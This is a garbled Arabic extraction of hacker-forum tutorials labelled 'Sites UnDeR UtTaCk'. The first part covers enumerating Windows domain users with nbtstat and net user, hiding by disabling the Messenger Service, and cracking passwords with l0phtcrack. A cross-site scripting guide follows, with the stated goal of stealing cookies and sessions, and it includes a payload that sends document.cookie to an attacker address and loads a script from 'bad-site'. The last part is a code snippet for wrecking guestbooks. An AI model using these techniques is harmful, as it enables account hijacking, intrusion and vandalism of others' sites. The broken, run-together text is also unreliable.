‫ﻗﻢ ‪٢٥٤‬‬ ‫ﻗﻢ ‪١‬إﻟﻰ ﺟﻬﺎز ر‬ ‫ﻣﻦ ﺟﻬﺎز ر‬
‫ﺘﺠﯿﺐ ﻃﺒﻌﺎ‬
‫ً‬ ‫ﺘﺼﻠﻪﻓﻠﻦﺗﺴ‬ ‫ﺘﻐ ﻞ ﺎﻟﺨﺪﻣﻪﻓﯿﻬﺎاماﻟﻌﻨﺎوﯾﻦاﻟﻐﯿ ﺮ ﻣ‬ ‫ﻮﺑﺎﻟﻨﺴﺒﻪﻟﻸﺟﻬﺰهاﻟﺼ ﺤﯿ ﺤﻪ ﺳﻮ فﺗﺸ‬
‫ﻃﯿﺐاﻧ ﺖاﻻاﻻن ﻣﺎﺗﻘﺪرﺗﺴﻮي ﺷﻲ \‬
‫ﺘﺎﻛﺪ ﻣﻦ ﺣﺴﺎب ‪ Administrator‬ﻣﻮﺟﻮد واﻻ ﻻاوﺗﻢﺗﻐﯿﯿ ﺮهاواذا ﻫﻨﺎك ﯾﻮزر ﻧﯿﻢﺑﻨﻔ ﺲ‬ ‫ﺑ ﺲﺗﻘﺪرﺗ‬
‫اﻟﺼﻼ ﺣﯿﺎ تاﻧ ﺖﺑﻄﺒﯿﻌﻪاﻟ ﺤﺎ ل ﻣﺎﺗﻘﺪرﺗ ﺤﺼ ﻞ ﻋﻠﯿﻪﺑﺴﻬﻮﻟﻪ‬
‫ﺘﺨﺪﻣﯿﻦاﻟﻤﻮﺟﻮدﯾﻦﻓﻲ‬ ‫ﺎذنﻫﻨﺎكاﺑﻮاب ﺧﻠﻔﯿﻪﻟﻠ ﺤﺼﻮ ل ﻋﻠﯿﻪ ﻣﻦﺑﻌ ﺾاﻟﻄ ﺮ قاﻟﻮ ﺻﻮ لﻟﺒﻌ ﺾاﺳﻤﺎ ء ﺎﻟﻤﺴ‬
‫ﺘﺒ ﺮ ﻋﯿﺐ ﻣﻦ ﻋﯿﻮن ‪Windwos‬ﻻﻧﻬﺎﺗﻄﻨﺸﻬﻢ ﻫﻬﻬﻬﻬﻬﻬﻬﻪ ﻣﺪريﻟﯿ ﺶ‬ ‫اﻟﺸ ﺮﻛﻪ وﻫﺬا ﯾﻌ‬
‫ﻓﯿﻪاﻣ ﺮﺗﻘﺪرﺗﻌ ﺮ ف ﻣﻦ ﺧﻼﻟﻪﺑ ﺲأﻻاﻻناﻧ ﺖ ﻣﺎﺗﻘﺪرﺗﺴﻮﯾﻪ ﻻﻧﻪ ﻣﺎﻟﻚ ﺣ ﻖ وﺻﻮ ل ﻣﺒﺎﺷ ﺮ ﯾﻌﻨﻲاﻧ ﺖ ﻻزم‬
‫ﺗ ﺤﺼ ﻞ ﻋﻠﻰ ‪username and password‬ﻻي ﯾﻮزر ﻣﻮﺟﻮدﻓﻲاﻟﻤﺠﺎ لاﻻﻣ ﺮ ﻫﻮ ‪ net user‬ﻮﻫﻮ‬
‫ﺘﺨﺪﻣﯿﻦاﻟﻤﻮﺟﻮدﯾﻦﺑﺎﻟﻤﺠﺎ ل‬ ‫ﺘﻌ ﺮ ﺿﻠﻚ ﺟﻤﯿﻊاﻟﻤﺴ‬ ‫ﯾﺴ‬
‫ﻟﻜﻦﻓﯿﻪ ﻃ ﺮﯾﻘﻪﻟﻠ ﺤﺼﻮ ل ﻋﻠﻰاﺳﻤﺎ ءﺑﺎﻟﻬﺒ ﻞ ﻫﻬﻬﻬﻬﻬﻪ‬
‫ﻛﯿ ﻒ ؟؟‬
‫ﺘﺴﺠﯿ ﻞاﺳﻤﻪﻓﻘﻂﺑ ﻞاﺳﻢ ﺟﻬﺎزه ﯾﻌﻨﻲ ﻋﻠﻰ‬ ‫ﺘﺴﺠﯿ ﻞ د ﺧﻮ ل ﯾﻘﻮم ﺟﻬﺎزهﻟﯿ ﺲﻓﻘﻂﺑ‬ ‫ﺘﺨﺪمﺑ‬ ‫ﺎﻻن ﻋﻨﺪﻣﺎ ﯾﻘﻮم ﻣﺴ‬
‫ﺘﻰ ﯾﻌ ﺮ فاﻧﻪ و ﺻ ﻞﻟﻠ ﺤﺪ‬ ‫ﻗﺒﻪاﻟﻨﻈﺎم ﺣ‬ ‫ﺳﺒﯿ ﻞاﻟﻤﺜﺎ ل ﻣﺪﯾ ﺮاﻟﺸﺒﻜﻪاذا ﺻﺎر ﻋﻨﺪه ز ﺣﻤﻪ ﯾﺸﻐ ﻞ ﺧﺪﻣﻪاﺳﻤﻬﺎ ﻣ ﺮا‬
‫ﻗﺼﻰ‬ ‫اﻷ‬
‫ﺘﺨﺪمﻛﺎ ﺣﺪ‬ ‫ﺘﺴﺠﯿ ﻞاﺳﻢاﻟﻤﺴ‬ ‫ﺘﺴﺠﯿ ﻞاﻟﺪ ﺧﻮ لﺗﻘﻮم ﺧﺪﻣﻪ ‪Messenger Service‬ﺑ‬ ‫ﺘﺨﺪمﺑ‬ ‫ﻋﻨﺪﻣﺎ ﯾﻘﻮم ﻣﺴ‬
‫ﺘ ﺮا ضاﻧﻚ د ﺧﻠ ﺖ ﻋﻠﻰ‬ ‫اﺳﻤﺎ ء ‪ NetBios‬ﺎﻟﻤﻮﺟﻮدﯾﻦﻓﻲاﻟﺸﺒﻜﻪاﻟﻲ ﺎﻧ ﺖاﺳﺎﺳﺎ ﺟﺎﻟ ﺲﺗﺒ ﺤﺚ ﻋﻨﻬﻢ وﻋﻠﻰاﻓ‬
‫ﺧﺎدمﺑﻌﻨﻮان ‪IP 200.200.200.200‬ﻓﺄناي ﺷﺨ ﺺاذاﻗﺎمﺑﻌﻤ ﻞ ‪nbtstat -a‬‬
‫ﺘﺨﺪم واذاﻛﺎن ﺟﻬﺎزك‬ ‫ﺘﻜﻤﻦ ﻣﻦ ﻣﻌ ﺮﻓﻪاﺳﻢ ﺟﻬﺎزك ﻮاﺳﻢاﻟﻤﺴ‬ ‫‪ 200.200.200.200‬ﺳﯿ‬
‫ﺘﻔﺼﯿ ﻞ (‬ ‫‪MSBROWSER‬ﺎو ﻻ ) ﺳﻮ فاﺗ ﺤﺪ ث ﻋﻨﻬﺎﺑﺎﻟ‬
‫ﻗﻢ‪ IP 200.200.200.50‬ﻣﻮﺟﻮدﻓﻲاﻟﺸﺒﻜﻪﻓﺎﻧﻚاذاﻗﻤ ﺖ‬ ‫ﻃﯿﺐﻟﻨﻔ ﺮ ضانﻓﯿﻪ ﺷﺨ ﺺﺑﺎﺳﻢ ‪ John‬ﻮر‬
‫ﺑﻌﻤ ﻞ ‪ Nbtstat -a 200.200.200.50‬ﺮا ح ﯾ ﻀﻬ ﺮﻟﻚاﻧﻪﻓﯿﻪ ﺷﺨ ﺺﺑﺎﺳﻢ ‪ john‬ﻮاﺳﻢ ﺟﻬﺎزه‬
‫‪johnPC‬‬
‫ﺘﻤﺎ ل ﯾﻜﻮن ‪ ( Administrator‬ﻃﯿﺐ و ش ﻧﺴﻮي‬ ‫ﺘﺨﺪم )ا ﺣ‬‫ﺎﻷن ﻣﻮﺟﻮد ﻣﻌﻚاﺳﻢ ﻣﺴ‬
‫؟‬
‫ﺘﺨ ﺶ‬ ‫ﺘﻢﺗﺴﺠﯿ ﻞاﺳﻤﻚﻓﻲاﻟﻨﻄﺎ ق ﯾﻌﻨﻲﺑ‬ ‫ﺘﻌﻄﯿ ﻞ ﺧﺪﻣﻪ ‪Messenger Service‬ﻓﻲ ﺟﻬﺰك ) وﻟﻦ ﯾ‬ ‫ﻗﻮمﺑ‬
‫ﻣﺨﻔﻲ (‬
‫ﺘﻬﺎﺑﻌﺪ ﻋﻤ ﻞاﻻﻣ ﺮ ‪nbtstat -a‬‬ ‫ﻮﺑﺎﻟﺴﻨﺒﻪ ل ‪ MSBROWSER‬ﺎذا ﺷﻔ‬
‫ﻗﺐ‬ ‫ﺘﻲ ﯾﻘﻮﻣﻮنﺑﻬﺎ ﻣﺪرا ءاﻟﺸﺒﻜﺎ ت ﻻن ﻣ ﺮا‬ ‫ﺘﻌ ﺮا ض رﺋﯿﺴﻲﻟﻠﻤﺠﺎ ل وﻫﺬا ﻣﻦاﻛﺒ ﺮاﻻ ﺧﻄﺎ ءاﻟ‬ ‫ﻫﺬا ﯾﻌﻨﻲاﻧﻪاﺳ‬
‫ﺘﻐﻼ ل ﻣﺜ ﻞ ﻫﺬهاﻟﺜﻐ ﺮا ت داﺋﻤﺎﻓﻲاﻟﺸﺒﻜﺎ تاﻟﺪا ﺧﻠﯿﻪ‬ ‫ﺘﻄﯿﻊاﺳ‬ ‫ﺘﺠﻤﯿﻊ وﺗﺴ‬‫ﺘﻄﯿﻊاﻟ‬ ‫اﻟﻤﺠﺎ ل ﯾﺪو خ ﻻ ﯾﺴ‬
‫ﺘﺴﺨﺪم‬ ‫ﻃﯿﺐاﻧ ﺖاﻻن ﺣﺼﻠ ﺖ ﻋﻠﻰاﺳﻢاﻟﻤ‬
‫ﻗﺪر تﺗ ﺤﺼ ﻞ ﻋﻠﻰ‬ ‫ﺘﺎجﻛﻠﻤﻪاﻟﻤ ﺮور وﻫﺬي ﻫﻲاﻟﻤﺸﻜﻠﻪ ﯾﻌﻨﻲاﻧ ﺖ ﺿﻤﯿ ﺖ ﺟﻬﺎزك ﻣﻊاﻟﺸﺒﻜﻪﻟﻜﻦ ﻣﺎ‬ ‫اﻧ ﺖ ﻣ ﺤ‬
‫ﺘﺎﻛﺪ ﻣﻦ‬ ‫ﺘ ﺤﺴ ﺲاﻟﺸﺒﻜﻪ ) ﻣﻌﻠﯿ ﺶ ﻣﺎﻧﻲ ﻣ‬ ‫ﻛﻠﻤﻪاﻟﻤ ﺮورﻟﻜﻦﺗﻘﺪرﺗ ﺤﺼ ﻞ ﻋﻠﯿﻬﺎ ‪ nt senstiver‬ﺎو ﻣ‬
‫اﻟﺴﺒﯿﻠﻨ ﻖ ( ‪.‬‬
‫ﻗﺪرا ﺣﺼ ﻞﻓﻌﻠﯿﺎ ﻋﻠﻰﻛﻠﻤﻪاﻟﻤ ﺮور‬ ‫ﻃﯿﺐﻛﯿ ﻒا‬
‫ﺘﺨﺪﻣﯿﻦﺗﺎﻓﻔﻪ ﺟﺪا ﻫﺎذاذا وﺟﺪ تاﺻﻼ‬ ‫ﻏﺎﻟﺒﺎ ﻣﺎﺗﻜﻮنﻛﻠﻤﺎ ت ﻣ ﺮوراﻟﻤﺴ‬
‫ﯾﻌﻨﻲﺑ ﺮﻧﺎﻣ ﺞ ﻣﺜ ﻞ ‪ l0pthcrack‬ﯾ ﺤ ﻞﻟﻚاﻟﻤﺸﻜﻠﻪ‪....‬‬

‫‪٢ ٠١‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" ‪" Cross Site Scripting‬‬

‫‪$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪tcp:‬‬
‫‪$$$$$$$$‬‬

‫ﺘﻄﻠﺒﺎ ت ‪:‬‬
‫اﻟﻤ‬

‫ﻣﻌ ﺮﻓﺔﺗﺎﻣﻪﺑﻠﻐﺔ ‪HTML‬‬

‫ﺘﯿﻨ ﻖ وﻫﻲ ‪JAVASCRIPT ,PERL ,CGI ,VBSCRIPT‬‬


‫ﺘﻌﻤ ﻖ ﻋﻠﻰﻟﻐﺎ تاﻟﺴﻜ ﺮﺑ‬
‫ا ﻃﻼ ع ﻏﯿ ﺮ ﻣ‬

‫ﺘﻤ ﻞ‬
‫وﻣﻦ وﺟﻬﺔ ﻧﻈ ﺮ ﺷﺨﺼﯿﺔاﻟﻤﺼﺎﯾﺐﻛﻠﻬﺎ ﻣﻦاﻟﺠﺎﻓﺎ ﺳﻜ ﺮﺑ ﺖ واﻟﻬ‬

‫==========================================================‬

‫اﻻﻫﺪا فاﻟﻤﻨﺸﻮده ‪:‬‬

‫ﺘﺨﺪم‬
‫ﻗﺔ ﻣﻌﻠﻮﻣﺎ ت ﻫﺎﻣﻪ ﻣﻦ ﺟﻬﺎزاﻟﻤﺴ‬
‫ﺘﻢﻓﯿﻬﺎ ﺳ ﺮ‬
‫ﺘﻰ ﯾ‬
‫*اﻓﻬﺎماﻟﻘﺎرئ ﻋﻦاﻟﻜﯿﻔﯿﺔاﻟ‬

‫ﺘﺪﯾﺎ ت ﻣﻦ ﻧﻮ ع ‪VBULLETIN‬او ‪YaBB and UBB‬اواﻟﻤﺠﻼ ت ﻣﻦاﻟﺒﻬﺐ ﻧﯿﻮكاو‬


‫ﺘ ﺮا قاﻟﻤﻨ‬
‫*ا ﺧ‬
‫ﺑﻮﺳ ﺖ ﻧﯿﻮك‬

‫ﺘﺨﺪﻣﯿﻦ‬
‫ﺘﻄﺎ فاﻟﺠﻠﺴﺔ ﻣﻦاﻟﻤﺴ‬
‫ﻗﺔاﻟﻜﻮﻛﯿﺰاوا ﺧ‬
‫ﺘﻢﻓﯿﻬﺎ ﺳ ﺮ‬
‫ﺘﻲﺗ‬
‫*اﻓﻬﺎماﻟﻘ ﺮا ء ﻋﻦاﻟﻜﯿﻔﯿﺔاﻟ‬

‫ﺘ ﺮا ق‬
‫ﺘﻄﯿﻊاﻟﻘﺎرئﺗﻮﺳﯿﻊ ﻣﺪا ﺧ ﻞاﻻ ﺧ‬
‫*ان ﯾﺴ‬

‫اﻟﻤﺸﻜﻠﺔ ‪:‬‬

‫ﺘ ﺮﺟﻤﺎ تاﻟﻨﺼﻮ صاو‬


‫ﺘﻌ ﺮ ﺿﺎ تاﻟﻮب ﻣﺜ ﻞاﻻﻛﺴﺒﻠﻮرراو ﻧ ﺖ ﺳﻜﯿﺐ ‪...‬اﻟ ﺦﺗﺎﺗﻲ ﻣ‬
‫ﻛﻤﺎ ﻫﻮ ﻣﻌ ﺮو فﻓﺎن ﻣﺴ‬
‫ﺘﺎ ت‬
‫اﻟﺴﻜ ﺮﺑ‬

‫ﺘﺨﺪمﻓﻠﻮاﻧﻨﺎ ﻃﻠﺒﻨﺎ ﺻﻔ ﺤﺔﻛﺎنﺑﻬﺎ ﺳﻜ ﺮﺑ ﺖ ﻣﻌﯿﻦ‬


‫ﺘﺎ ت ﻋﻠﻰ ﺟﻬﺎزاﻟﻤﺴ‬
‫ﺘﻢﺗ ﺮﺟﻤﺔاﻟﺴﻜ ﺮﺑ‬
‫ﻣﺒﻨﯿﺔ دا ﺧﻠﻬﺎ وﯾ‬

‫ﺘ ﺮﺟﻢ ﻫﺬااﻟﺴﻜ ﺮﺑ ﺖ وﯾﻈﻬ ﺮه ﻋﻠﻰ ﻧﻔ ﺲاﻟﺼﻔ ﺤﻪاﻟﻤﻄﻠﻮﺑﻪ ‪.‬‬


‫ﺘﻌ ﺮ ض ﯾ‬
‫ﻓﺎناﻟﻤﺴ‬

‫ﺘﺒ ﺮﻫﺎ ﺧ ﺮ قﻟﻠﺨﺼﻮﺻﯿﺔ‬


‫ﺘﺎ ت وﺗﻌ‬
‫اﻣﺎﺑﺎﻟﻨﺴﺒﺔﻟﻠﻤﻨﺪﯾﺎ تاو ﻣﺠﻤﻮﻋﺎ تاﻟﻨﻘﺎ شﻓﺎﻧﻬﺎﺗ ﺮﻓ ﺾ ﻣﺜ ﻞ ﻫﺬهاﻟﺴﻜ ﺮﺑ‬

‫ﺘﺨﺪﻣﯿﻦ‬
‫ﻗﺔ ﻣﻌﻠﻮﻣﺎ ت ﺣﺴﺎﺳﺔ ﻣﻦاﻟﻤﺴ‬
‫ﺘﻐ ﻞﻓﻲاﻏ ﺮا ض ﺳﯿﺌﺔﻟﺴ ﺮ‬
‫اوﻗﺪﺗﺴ‬

‫ﺘﺎﻟﻲ ﯾﻮ ﺿﺢﻛﯿﻔﯿﺔادراجاﻟﺴﻜ ﺮﺑ ﺖ ‪:‬‬


‫اﻟﻤﺜﺎ لاﻟ‬

‫‪٢ ٠٢‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫‪message. Hello FOLKS board. This is a‬‬

‫>‪<SCRIPT/>malicious code<SCRIPT‬‬

‫‪end of my message. This is the‬‬

‫ﺘﻮي ﻋﻠﻰﻛﻮد ﺧﺒﯿﺚ‬


‫ﻗﺪﺗ ﺤ‬
‫ﺘﻲاﻟﺴﻜ ﺮﺑ ﺖ و‬
‫انﻛﻠﻤﺔ ‪malicious code‬ﺗﻢادرﺟﻬﺎاو ﺣﻘﻨﻬﺎﻓﻲﺑﯿﻦ ﻋﻼﻣ‬

‫ﺘﺪﯾﺎ ت وﻣﻄﻮروا ﯾﻤﻨﻌﻮﻧﻬﺎاﻻاذا ﻣﻜﻨﻬﺎاﻻدﻣﻦ‬


‫ﯾﺴ ﺮ قاو ﯾ ﺮﺳ ﻞﺑﯿﺎﻧﺎ ت ‪...‬اﻟ ﺦﻟﺬﻟﻚﻓﺎن ﻣﺼﻤﻤﻮاﺑ ﺮاﻣ ﺞاﻟﻤﻨ‬

‫ﺘﻢادراجاﻟﺴﻜ ﺮﺑ ﺖ ﻣﻜﺎن ﺧﺎ ﺻﯿﺔاﻻﻣ ﺞ‬


‫ﺘﺪىﺗﻔﯿ ﻞ ‪ HTML‬ﻣﺜﻼ ﯾ‬
‫ﺘﺨﺪاﻣﻬﺎاذا ﻣﻜﻦاﻟﻤﻨ‬
‫ﺘﻢاﺳ‬
‫اواﻟﻤﺼﻤﻢاوﻗﺪ ﯾ‬

‫>‪img>document.write('<script‬‬
‫؛>‪<script/‬‬
‫"'‪'<src="http://my_ip_address/'+document.cookie+‬‬

‫ﺘﺐ ﻋﻠﻰ ﺷﻜ ﻞ راﺑﻂﻓﻲ ﺻﻔ ﺤﺔاو ﯾ ﺮﺳ ﻞﻟﻚﺑﺎﻟﺒ ﺮﯾﺪاو ﯾ ﺮﺳ ﻞﻟﻚ ﻋﻦ ﻃ ﺮﯾ ﻖ‬


‫ﺘﻄﯿﻊاﻟﺴﻜ ﺮﺑ ﺖان ﯾﻜ‬
‫اوﻗﺪ ﯾﺴ‬
‫اﻟﻤﺴﻨﺠ ﺮ‬

‫ﺘﺎﻟﻲ ﯾﻮ ﺿﺢﻟﻚﻛﯿﻔﯿﺔ ﻋﻤ ﻞ راﺑﻂﻓﻲ ﺻﻔ ﺤﺔ‬


‫واﻟﻤﺜﺎ لاﻟ‬

‫>‪<SCRIPT>HREF="http://example.com/comment.cgi? mycomment= A‬‬


‫‪<A/>Click here <"<SCRIPT/>code malicious‬‬

‫اﻧﻈ ﺮ ﻫﻨﺎ ورﻛﺰﻓﻲﻛﯿﻔﯿﺔ ﻋﻤ ﻞاﻟﻜﻮداﻧﻬﺎﻓﻘﻂ ﻋﻨﺪﻣﺎ ﯾﺼﻠﻚﺑﺎ ﺣﺪاﻟﻄ ﺮ قاﻟﻤﺬﻛﻮرهاﻋﻼه وﺗ ﻀﻐﻂ ﻋﻠﯿﻪ ﺳﯿﻨﻔﺬ‬
‫اﻟﺴﻜ ﺮﺑ ﺖ‬

‫ﻗﻊاوﻗﺪ ﯾﻜﻮن‬
‫وﻟﻠﺸ ﺮ حاﻛﺜ ﺮﻟﻨﻔ ﺮ ضاناﻟﺴﻜ ﺮﺑ ﺖ ‪ comment.cgi‬ﺳﻜ ﺮﺑ ﺖ ﯾ ﺮﺳ ﻞ ﻣﻼ ﺣﻈﺎﺗﻚﻟﺼﺎ ﺣﺐاﻟﻤﻮ‬
‫ﺳﻜ ﺮﺑ ﺖﻟﻠﺒ ﺤﺚ‬

‫ﺘﻐﯿ ﺮ دا ﺧﻠﻪاﺳﻤﻪ ‪ mycomment‬ﯾﺎ ﺧﺬاﻟﻤﺪ ﺧﻼ تاو‬


‫ﺘﻮي ﻋﻠﻰ ﻣ‬
‫ﺘﺪى وﻫﻮ ﯾ ﺤ‬‫ﻗﻊاواﻟﻤﻨ‬ ‫ﻓﻲاﻟﻤﻮ‬
‫ﺘﺒﻬﺎ‬
‫ﺘﻲﺗﻜ‬ ‫اﻟﻤﻼ ﺣﻈﺎ تاﻟ‬

‫ﺘﺎﺋ ﺞ و ﺧﯿﻤﺔﻓﺒﺪ لان‬


‫ﺘﻜﻮناﻟﻨ‬
‫ﺘﺒ ﺮﻧﺎهاﻧﻪ ﺳﻜ ﺮﺑ ﺖﺑ ﺤﺚ وﯾﻮﻟﺪ ﺻﻔ ﺤﺎ ت دﯾﻨﺎﻣﯿﻜﯿﺔ ﻧﺎﺗﺠﻪ ﻣﻦاﻟﺒ ﺤﺚ ﺳ‬
‫ﻓﻠﻮاﻋ‬

‫ﺘ ﺞ ﻣﺎﯾﻄﻠﺒﻪاﻟﺴﻜ ﺮﺑ ﺖ ﻣﻨﻪ ﻻ ﺣﻆاﻟﻔﻜ ﺮه ﻫﻨﺎﻓﻘﺪ ﺿﻤﻦاﻟﺴﻜ ﺮﺑ ﺖ دا ﺧ ﻞ‬


‫ﺘ ﺞاﻟﺼﻔ ﺤﺎ تاﻟ ﺤﯿﻮﯾﺔاواﻟﻨﺸﻄﻪ ﺳﯿﻨ‬
‫ﯾﻨ‬

‫ﺘﺨﺪمﻟﯿﺄ ﺧﺬاواﻣ ﺮ ﻣﻦاﻟﺴﻜ ﺮﺑ ﺖ ‪.‬‬


‫ﺣﻘ ﻞ ﻧﺼﻲﻓﺒﺪﻻ ﻣﻦان ﯾﺎ ﺧﺬاﻟ ﺤﻘ ﻞاﻟﻨﺼﻲ ﻧﺼﻮ صاﺳ‬

‫ﺘﺎﻟﻲ ‪:‬‬
‫ﺘﻰاﻋﻘﺪاﻻﻣﻮراﻛﺜ ﺮ ﻻ ﺣﻆاﻟﻤﺜﺎ لاﻟ‬
‫وﺣ‬

‫>‪SCRIPT>HREF="http://example.com/comment.cgi? mycomment= A‬‬


‫'‪<A/>here Click <"<SCRIPT/><SRC='http://bad-site/badfile‬‬

‫‪٢ ٠٣‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﻗﻊا ﺧ ﺮ‬
‫ﺘﺨﺪﻣﺎﻓﻲادراج ﻣﻠ ﻒ ﻣﻦ ﻣﻮ‬
‫ﺘﺨﺪم ﻧﻔ ﺲاﻟﺴﻜ ﺮﺑ ﺖاﻟﺴﺎﺑ ﻖﻟﻜﻦﻫﺬهاﻟﻤ ﺮه ﻃﻮرهاﻛﺜ ﺮﻟﯿﻜﻮن ﻣﺴ‬
‫ﻫﻨﺎاﺳ‬
‫واﻟﺬي‬

‫ﻫﻮﺑﺎﻻﺳﻢ ‪ BADFILE‬وﻻن ﻣﺼﺪراﻟﺒﯿﺎﻧﺎ تاد ﺧ ﻞﻓﯿﻪ ﻋﺪة ﻣﺼﺎدرا ﺧ ﺮى ﻋﻦ ﻃ ﺮﯾ ﻖاﻟﺴﻜ ﺮﺑ ﺖاﻟﻤﺬﻛﻮر‬


‫ﻓﺄنﻫﺬااﻟﻬﺠﻮم‬

‫ﻗﻊ " ﻻﻧﻨﺎ ﻋﺒ ﺮﻧﺎ‬


‫ﺘ ﺮﺟﻤﻪ ﻣﻦ ﻋﻨﺪي "ﺑ ﺮﻣﺠﺔ ﻋﺒﻮراﻟﻤﻮ‬
‫ﯾﺴﻤﻰ ب ‪cross-site scripting‬اواﻟ‬
‫ﺘﺨﺪامﺑ ﺮﻣﺠﺔ‬
‫ﺑﺎﺳ‬

‫ﺘﺼ ﺮ ب ‪CSS‬‬
‫ﻗﻊاﻻﻣﻨﯿﻪﺗﺨ‬
‫ﻗﻊ واذاﻛﻨ ﺖﺗﻼ ﺣﻆﻓﻲاﻟﺴﯿﻜﯿﻮرﺗﻲﻓﻮﻛ ﺲاواﻟﻤﻮا‬
‫ﺘﺎ تاﻛﺜ ﺮ ﻣﻦ ﻣﻮ‬‫اﻟﺴﻜ ﺮﺑ‬
‫ﺘﺼﺎر‬ ‫وﻫﻲا ﺧ‬

‫ﺘﺎﻟﯿﺔ‬
‫ﺘ‬‫ل ‪ scripting cross-site‬وﻟﯿ ﺲ ل ‪ CASCADE style sheets‬اياورا قاﻻﻧﻤﺎطاﻟﻤ‬

‫ﺘﺎﻟﯿﺔ‬
‫ﻗﺪ ﯾﺪ ﺧ ﻞﺑﺪ لاﻟﻮﺳﻢاو ﻋﻼﻣﺔاﻟﺴﻜ ﺮﺑ ﺖاي ﻣﻦاﻟﻮﺳﻮماﻟ‬

‫>‪<EMBED> and ،<APPLET> ،<OBJECT> ،<SCRIPT‬‬

‫وﻣﻦاﻟﻤﻤﻜﻦان ﯾﻜﻮنﻫﻨﺎك وﺳﻢاﻟﻨﻤﺎذج >‪ <form‬ﻣﻦ وﺳﻮم ‪ HTML‬وﺑﻨﻔ ﺲاﻻﻓﻜﺎراﻟﺴﺎﺑﻘﺔ ﯾﻤﻜﻦﺗﻨﻔﯿﺬ‬


‫اﻻواﻣ ﺮ‬

‫ﻗﺔاﻟﻜﻮﻛﯿﺰاوﺑﯿﺎﻧﺎ تا ﺧ ﺮىاوﺗﻮﺟﯿﻬﻚﻟﺼﻔ ﺤﺎ تا ﺧ ﺮى‬


‫ﻣﻨﻬﺎﻟﺴ ﺮ‬

‫ﻗﺼﺪه‬
‫ﺘﻄﯿﻊاﻻنانﺗﻔﻬﻢ ﻣﺎا‬
‫ﺘﻜﻮﯾﺪاﻟﺴﺪاﺳﻲ ﻋﺸ ﺮ واﻟﯿﻮﻧﯿﻜﻮدﺗﺴ‬
‫ﺘﻪ ﻋﻦاﻟ‬
‫ﺘﺒ‬
‫اذاﻛﻨ ﺖﻗ ﺮا ت ﻣﺎﻛ‬

‫=========================================================‬

‫ﺘﻔﺎ ﺻﯿ ﻞ ‪:‬‬
‫وﻟﻤﺰﯾﺪ ﻣﻦاﻟ‬

‫‪http://www.cert.org/advisories/CA-2000-02.html‬‬

‫‪http://www.perl.com/pub/a/2002/02/20/css.html‬‬

‫‪...‬‬

‫‪٢ ٠٤‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" ﻛﻮد ﺗﺪﻣﲑ ﺳﺠﻞ اﻟﺰوار "‬

‫‪$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪:‬اﻟﻌﺒﻘ ﺮي‬
‫‪$$$$$$$$$$‬‬

‫ﻗﯿﻊ‬
‫ﺘﻢﺗﻌ ﺮﻓﻮن ﻃﺒﻌﺎﻛﯿﻔﯿﺔ ﻋﻤ ﻞﺗﻮ‬ ‫ﻛﻮد ﺻﻐﯿ ﺮ ﺟﺪاﺑ ﺤﺠﻤﻪ‪،‬ﻛﺒﯿ ﺮﺑﻘﺪرﺗﻪ ﻋﻠﻰﺗﺪﻣﯿ ﺮ ﺳﺠ ﻞاﻟﺰوارﺑﺎﻟﻜﺎﻣ ﻞ‪...‬اﻧ‬
‫ﺘﺪﻻ ل‪......‬واﻟﻨﻘﻄﻪاﻟﻤﻬﻤﻪ‬
‫ﻗﻊ‪ -‬ﻃ ﺮﯾﻘﺔ ﺎﻷﺳ‬ ‫ﻗﻌﻚاﻟﺸﺨﺼﻲ‪-‬ﺗﻘﺪﯾ ﺮكﻟﻠﻤﻮ‬ ‫ﻓﻲ ﺳﺠ ﻞاﻟﺰوار‪،‬اﻷﺳﻢ‪-‬اﻷﯾﻤﯿ ﻞ‪ -‬ﻣﻮ‬
‫ﻗﻊ؟؟؟؟؟؟؟‬ ‫ﺘﺎﺑﺔﺗﻌﻠﯿﻘﻚ ﻋﻠﻰاﻟﻤﻮ‬ ‫وﻫﻲﻛ‬

‫ﺘﺐ‪:‬‬
‫ﺘﻌﻠﯿ ﻖ ‪...........‬ﻧﻘ ﻒ وﻧﻜ‬
‫ﺘﺎﺑﺔاﻟ‬
‫ﻧ ﺤﻦ ﺳﻮ ف ﻧ ﻀﻊﻛ ﻞ ﺷﻲ ﺣﺴﺐ ﻣﺎﻫﻮ ﻣﻄﻠﻮب وﻟﻜﻦ ﻋﻨﺪﻣﺎ ﻧﺄﺗﻲﻟﻜ‬
‫‪.‬‬
‫‪.‬‬
‫‪.‬‬
‫‪.‬‬
‫‪.‬‬
‫‪.‬‬
‫‪.‬‬
‫‪.‬‬
‫‪.‬‬
‫‪.‬‬
‫‪.‬‬
‫‪.‬‬
‫‪.‬‬

‫ﻫﺬا ﻫﻮاﻟﻜﻮد ‪:‬‬


‫==================================================‬

‫‪h3>put your text here<xmp><plaintext><--‬‬

‫==================================================‬

‫ﻗﯿﻌﻚاﻋﻤ ﻞ‬
‫ﺘﺎﺑﺔاي ﺷﻲﺗ ﺮﯾﺪﻓﻲ ﻣﻜﺎن‪ put your text here ....‬ﻮﻫﺬاﻛ ﻞ ﺷﻲ ‪....‬ﺑﻌﺪﺗﻮ‬ ‫ﯾﻤﻜﻨﻚﻛ‬
‫رﯾﻔ ﺮﯾ ﺶ ﻮاﻧﻈ ﺮ ﻣﺎذا ﺣﺼ ﻞ‬

‫ﻣﻼ ﺣﻈﻪ‪:‬‬
‫=====‬
‫ﺎﻟﻜﻮد ﻻ ﯾﻌﻤ ﻞ ﻣﻊﺑﻌ ﺾاﻧﻮا ع ﺳﺠ ﻞ ﺎﻟﺰوار؟!‪...‬‬

‫‪٢ ٠٥‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" ﺷﺮح ﺷﺒﻪ ﻣﻔﺼﻞ ﻋﻦ اﻟﺜﻐﺮات "‬


‫‪$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪icer:‬‬
‫‪$$$$$$$$‬‬

